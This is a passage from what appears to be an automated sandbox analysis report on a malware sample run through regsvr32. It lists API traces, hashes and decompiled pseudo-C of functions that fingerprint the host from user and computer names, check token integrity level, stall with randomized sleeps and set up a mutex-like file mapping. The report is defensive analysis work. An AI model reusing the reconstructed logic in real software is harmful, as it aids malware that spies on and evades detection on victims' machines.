0x00f49f47
0x00f49f50
0x00f49f57
0x00f49f60
0x00f49f63
0x00f49f66
0x00f49f6d
0x00f49f70
0x00000000
0x00000000
0x00f49f72
0x00f49f75
0x00f49f78
0x00f49f7b
0x00000000
0x00f49f7d
0x00f49f87
0x00f49f8c
0x00f49f8c
0x00000000
0x00f49fba
0x00f49fba
0x00f49fbf
0x00f49fde
0x00f49fe0
0x00f49fe5
0x00f49fe6
0x00000000
0x00f49fc1
0x00f49fc1
0x00f49fc7
0x00000000
0x00f49fc9
0x00f49fc9
0x00f49fce
0x00f49fd0
0x00f49fd5
0x00f49fd6
0x00f49fec
0x00f49fec
0x00f49ff4
0x00f49fff
0x00f4a002
0x00f4a00d
0x00f4a00f
0x00f4a011
0x00f4a014
0x00000000
0x00f4a01a
0x00000000
0x00f4a01a
0x00f4a014
0x00f49fc7
0x00000000
0x00f49fbf
0x00f49f8f
0x00f49f91
0x00f49f94
0x00f49f95
0x00f49f95
0x00f49f99
0x00f49fa3
0x00f49fa3
0x00f49fa9
0x00f49fac
0x00f49fac
0x00f49fb2
0x00f49fb2
0x00f4a02f
0x00000000

APIs

memset.NTDLL ref: 00F49EA7
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00F49EB3
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00F49ED8
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00F49EF4
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00F49F0D
RtlFreeHeap.NTDLL(00000000,00000000), ref: 00F49FA3
CloseHandle.KERNEL32(?), ref: 00F49FB2
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00F49FEC
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00F45A08,?), ref: 00F4A002
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00F4A00D

Part of subcall function 00F43B20: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05739388,00000000,?,73BCF710,00000000,73BCF730), ref: 00F43B6F
Part of subcall function 00F43B20: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,057393C0,?,00000000,30314549,00000014,004F0053,0573937C), ref: 00F43C0C
Part of subcall function 00F43B20: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F49F20), ref: 00F43C1E

GetLastError.KERNEL32 ref: 00F4A01F

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: e8bc1da9ee9b1d57872c74faf73d6de98254bc04843e675afc8b4c22119e671b
Instruction ID: 08cb27fd8d85c8e2a24425f8add43f387eb8f62c4d44393cbfaec3625ed64d84
Opcode Fuzzy Hash: e8bc1da9ee9b1d57872c74faf73d6de98254bc04843e675afc8b4c22119e671b
Instruction Fuzzy Hash: BD512A75D05229AADF10DF95DC449EEBFB8EB59320F204216F910E6290D7B49A44EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F49188, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00F49188(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00F4B062();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xf4d27c; // 0x47ea5a8
				_t5 = _t13 + 0xf4e862; // 0x5738e0a
				_t6 = _t13 + 0xf4e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00F4ACFA();
				_t17 = CreateFileMappingW(0xffffffff, 0xf4d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00f49188
0x00f49190
0x00f49194
0x00f4919a
0x00f4919f
0x00f491a4
0x00f491a7
0x00f491aa
0x00f491af
0x00f491b0
0x00f491b3
0x00f491b8
0x00f491bf
0x00f491c9
0x00f491cb
0x00f491cc
0x00f491cf
0x00f491eb
0x00f491f1
0x00f491f5
0x00f49243
0x00f491f7
0x00f49204
0x00f49214
0x00f4921c
0x00f4922e
0x00f49232
0x00000000
0x00000000
0x00f4921e
0x00f49221
0x00f49226
0x00f49228
0x00f49228
0x00f49206
0x00f49208
0x00f49234
0x00f49235
0x00f49235
0x00f49204
0x00f4924a

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00F458DB,?,?,4D283A53,?,?), ref: 00F49194
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00F491AA
_snwprintf.NTDLL ref: 00F491CF
CreateFileMappingW.KERNELBASE(000000FF,00F4D2A8,00000004,00000000,00001000,?), ref: 00F491EB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00F458DB,?,?,4D283A53), ref: 00F491FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00F49214
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00F458DB,?,?), ref: 00F49235
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00F458DB,?,?,4D283A53), ref: 00F4923D

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 10d3ac8204df7875f3836586bc825b35ef6a220b93e488b15e828070772a4a94
Instruction ID: 4e893a41ce530d1312cec6cd2abe9fc8bb066eecfaeaba6e17d45fb04dda8bb4
Opcode Fuzzy Hash: 10d3ac8204df7875f3836586bc825b35ef6a220b93e488b15e828070772a4a94
Instruction Fuzzy Hash: BF212476A01208FBC721DBA8CC05F9E7BB8AB59710F200061FE19E72D0D7F0DA00AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F43C3A, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00F43C3A(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xf4d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00F490BE( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xf4d278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xf4d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00F4168D(_v8 + _v8, _t63);
							}
							HeapFree( *0xf4d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xf4d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00F4168D(_v8 + _v8, _t63);
						}
						HeapFree( *0xf4d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00f43c3a
0x00f43c42
0x00f43c48
0x00f43c4b
0x00f43c4e
0x00f43c50
0x00f43c55
0x00f43c55
0x00f43c5b
0x00f43c5d
0x00f43c6a
0x00f43ccb
0x00f43c6c
0x00f43c71
0x00f43c77
0x00f43c7c
0x00f43c8a
0x00f43c8e
0x00f43c9d
0x00f43ca4
0x00f43cab
0x00f43cab
0x00f43cb6
0x00f43cb6
0x00f43c8e
0x00f43c7c
0x00f43ccd
0x00f43cd3
0x00f43cdd
0x00f43cdf
0x00f43ce4
0x00f43cf3
0x00f43cf7
0x00f43d02
0x00f43d09
0x00f43d10
0x00f43d10
0x00f43d1c
0x00f43d1c
0x00f43cf7
0x00f43d25
0x00f43d27
0x00f43d2a
0x00f43d2c
0x00f43d2f
0x00f43d32
0x00f43d3c
0x00f43d40
0x00f43d44

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00F43C71
RtlAllocateHeap.NTDLL(00000000,?), ref: 00F43C88
GetUserNameW.ADVAPI32(00000000,?), ref: 00F43C95
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00F459CA), ref: 00F43CB6
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F43CDD
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00F43CF1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F43CFE
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00F459CA), ref: 00F43D1C

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 1f682ee5dabbcda1f0283a39b81e61c04907c294e2c4924c0a3b5b2f91e99da4
Instruction ID: 2f2ea0fd7f2f79b4ec93e9e1fc71ffe328234b7cab8ceb59f68be1f3619403e1
Opcode Fuzzy Hash: 1f682ee5dabbcda1f0283a39b81e61c04907c294e2c4924c0a3b5b2f91e99da4
Instruction Fuzzy Hash: 8D311976A00209EFDB10DFB9DC81A6EBBF9EF59310F114469E905E7260D770EE41AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F410DF, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00F410DF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xf4d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00F43727(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00F46EF8(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00f410ec
0x00f410f3
0x00f410fa
0x00f4110e
0x00f41119
0x00f41131
0x00f4113e
0x00f41141
0x00f41146
0x00f41151
0x00f41155
0x00f41164
0x00f41168
0x00f41184
0x00f41184
0x00f41188
0x00f41188
0x00f4118d
0x00f41191
0x00f41197
0x00f41198
0x00f4119f
0x00f411a5

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00F41111
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00F41131
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00F41141
CloseHandle.KERNEL32(00000000), ref: 00F41191

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00F41164
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00F4116C
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00F4117C

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 95fd91978aa4eb0eb454df0d5bb9434a97437203a0800170a6166607ffacc8be
Instruction ID: 92c30b8aaffc54cb4ec28c246ddf700e9400765f178da5dc2b3084f7f4156f5a
Opcode Fuzzy Hash: 95fd91978aa4eb0eb454df0d5bb9434a97437203a0800170a6166607ffacc8be
Instruction Fuzzy Hash: 8C21287990025CFFEB009FA4DC84EAEBFBDEB49314F0040A5EA11A6161C7718A45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F4393E, Relevance: 9.2, APIs: 6, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 00F4397F
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00F43A01
StrStrIW.SHLWAPI(?,006E0069), ref: 00F43A40
SysFreeString.OLEAUT32(?), ref: 00F43A62

Part of subcall function 00F44D36: SysAllocString.OLEAUT32(00F4C2B0), ref: 00F44D86

SafeArrayDestroy.OLEAUT32(?), ref: 00F43AB6
SysFreeString.OLEAUT32(?), ref: 00F43AC4

Part of subcall function 00F44CD6: Sleep.KERNELBASE(000001F4), ref: 00F44D1E

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 566ba97d6025c7f597176fbe5bacaeb34214192d325dcd2c3c43bf4e5828b013
Instruction ID: 7fa4435f72cf8376060c80a2fa5dd6aba47e463219119336376d37105edd138a
Opcode Fuzzy Hash: 566ba97d6025c7f597176fbe5bacaeb34214192d325dcd2c3c43bf4e5828b013
Instruction Fuzzy Hash: 44514776900209EFDB10DFE8C88489EBBB6FF88310B148869E955EB210D775AE46DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A552, Relevance: 9.1, APIs: 6, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F45298: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057389D8,00F4A582,?,?,?,?,?,?,?,?,?,?,?,00F4A582), ref: 00F45364

Part of subcall function 00F45037: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00F45074
Part of subcall function 00F45037: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00F450A5

SysAllocString.OLEAUT32(00000000), ref: 00F4A5AE
SysAllocString.OLEAUT32(0070006F), ref: 00F4A5C2
SysAllocString.OLEAUT32(00000000), ref: 00F4A5D4
SysFreeString.OLEAUT32(00000000), ref: 00F4A638
SysFreeString.OLEAUT32(00000000), ref: 00F4A647
SysFreeString.OLEAUT32(00000000), ref: 00F4A652

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: f5b328dee5b84847f0aa5d4d4b30b81cd1c5cddfc2b37e0b9be0cafca0e8707c
Instruction ID: 80d5584d5edecb441b949dfaf9be02486bd19a9049291f895fd218a9be1a15f2
Opcode Fuzzy Hash: f5b328dee5b84847f0aa5d4d4b30b81cd1c5cddfc2b37e0b9be0cafca0e8707c
Instruction Fuzzy Hash: AE314E36D00609ABDB01EFACC844A9EBBB6AF49310F154465ED10EB220DB759E06DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F4947A, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00F4947A(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xf4d238 = _t10;
				if(_t10 != 0) {
					 *0xf4d1a8 = GetTickCount();
					_t12 = E00F4A499(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L00F4B1C6();
							_t33 = _t14 + _t16;
							_t18 = E00F44384(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E00F4707C(_t25) != 0) {
							 *0xf4d260 = 1; // executed
						}
						_t12 = E00F4584C(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x00f4947a
0x00f49480
0x00f49481
0x00f4948d
0x00f49495
0x00f4949a
0x00f494aa
0x00f494af
0x00f494b6
0x00f494b8
0x00f494bd
0x00f494c3
0x00f494c9
0x00f494d3
0x00f494d7
0x00f494d9
0x00f494de
0x00f494df
0x00f494e0
0x00f494e5
0x00f494eb
0x00f494f4
0x00f494f5
0x00f494fa
0x00f49500
0x00f4950c
0x00f4950e
0x00f4950e
0x00f49518
0x00f49518
0x00f4949c
0x00f4949e
0x00f4949e
0x00f49522

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00F480BD,?), ref: 00F4948D
GetTickCount.KERNEL32 ref: 00F494A1
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00F480BD,?), ref: 00F494BD
SwitchToThread.KERNEL32(?,00000001,?,?,?,00F480BD,?), ref: 00F494C3
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00F494E0
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00F480BD,?), ref: 00F494FA

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 051c206207063378f29d6c79cad1b38009a90461bc4cfbacbbea92e6b0536b1f
Instruction ID: d29ea39efe54db34420c0cb01dd9ed0fb6558a523e4d674a90d68d3a4cff9f15
Opcode Fuzzy Hash: 051c206207063378f29d6c79cad1b38009a90461bc4cfbacbbea92e6b0536b1f
Instruction Fuzzy Hash: C111A5B6B44204AFE720AB78EC0EB5B7EDC9B55760F104125FD05D62A1EBB8D800B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F4584C, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00F4584C(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00F47D74();
				if(_t21 != 0) {
					_t59 =  *0xf4d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xf4d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xf4d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00F4411B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xf4d27c; // 0x47ea5a8
					if( *0xf4d25c > 5) {
						_t8 = _t26 + 0xf4e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xf4ea15; // 0x44283a44
						_t27 = _t7;
					}
					E00F44BC9(_t27, _t27);
					_t31 = E00F49188(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xf4d270 =  *0xf4d270 ^ 0x81bbe65d;
						_t32 = E00F43727(0x60);
						__eflags = _t32;
						 *0xf4d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xf4d32c; // 0x57395b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xf4d32c; // 0x57395b0
							 *_t51 = 0xf4e836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xf4d238, 0, 0x43);
							__eflags = _t36;
							 *0xf4d2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xf4d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xf4d27c; // 0x47ea5a8
								_t13 = _t58 + 0xf4e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xf4c2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00F43C3A( ~_v8 &  *0xf4d270, 0xf4d00c); // executed
								_t42 = E00F4A032(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00F49388(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00F49E92(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E00F449F5(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xf4d160(); // executed
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00F43D90(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x00f4584c
0x00f45857
0x00f4585a
0x00f4585d
0x00f45860
0x00f45867
0x00f45869
0x00f45875
0x00f45877
0x00f45877
0x00f45880
0x00f45888
0x00f4588b
0x00f458a5
0x00f458b1
0x00f458b3
0x00f458b8
0x00f458c2
0x00f458c2
0x00f458ba
0x00f458ba
0x00f458ba
0x00f458ba
0x00f458c9
0x00f458d6
0x00f458dd
0x00f458e2
0x00f458e2
0x00f458ea
0x00f458ed
0x00f45913
0x00f4591f
0x00f45924
0x00f45926
0x00f4592b
0x00f45957
0x00f45959
0x00f4592d
0x00f45931
0x00f45936
0x00f4593b
0x00f45942
0x00f45948
0x00f4594d
0x00f45953
0x00f4595a
0x00f4595c
0x00f4595e
0x00f4596d
0x00f45973
0x00f45975
0x00f4597a
0x00f459aa
0x00f459ac
0x00f4597c
0x00f4597c
0x00f45982
0x00f4598f
0x00f45995
0x00f45995
0x00f4599d
0x00f459a6
0x00f459ad
0x00f459af
0x00f459b1
0x00f459b8
0x00f459c5
0x00f459ca
0x00f459cf
0x00f459d1
0x00f459d3
0x00000000
0x00000000
0x00f459d5
0x00f459da
0x00f459dc
0x00f459e3
0x00f459e7
0x00f459ea
0x00f459ff
0x00f45a03
0x00f45a08
0x00000000
0x00f45a08
0x00f459ec
0x00f459ee
0x00000000
0x00000000
0x00f459f4
0x00f459f9
0x00f459fb
0x00f459fd
0x00000000
0x00000000
0x00000000
0x00f459fd
0x00f459e0
0x00f459e0
0x00f459b1
0x00f458ef
0x00f458ef
0x00f458f4
0x00f45a0a
0x00f45a0e
0x00f45a16
0x00f45a16
0x00000000
0x00f45a0e
0x00f458fa
0x00f458fd
0x00f45907
0x00f4590e
0x00000000
0x00f45a1e
0x00f45a1e
0x00f45a22
0x00f45a26
0x00f45a26

APIs

Part of subcall function 00F47D74: GetModuleHandleA.KERNEL32(4C44544E,00000000,00F45865,00000000,00000000), ref: 00F47D83

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00F458E2

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

memset.NTDLL ref: 00F45931
RtlInitializeCriticalSection.NTDLL(05739570), ref: 00F45942

Part of subcall function 00F449F5: memset.NTDLL ref: 00F44A0A
Part of subcall function 00F449F5: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00F44A3E
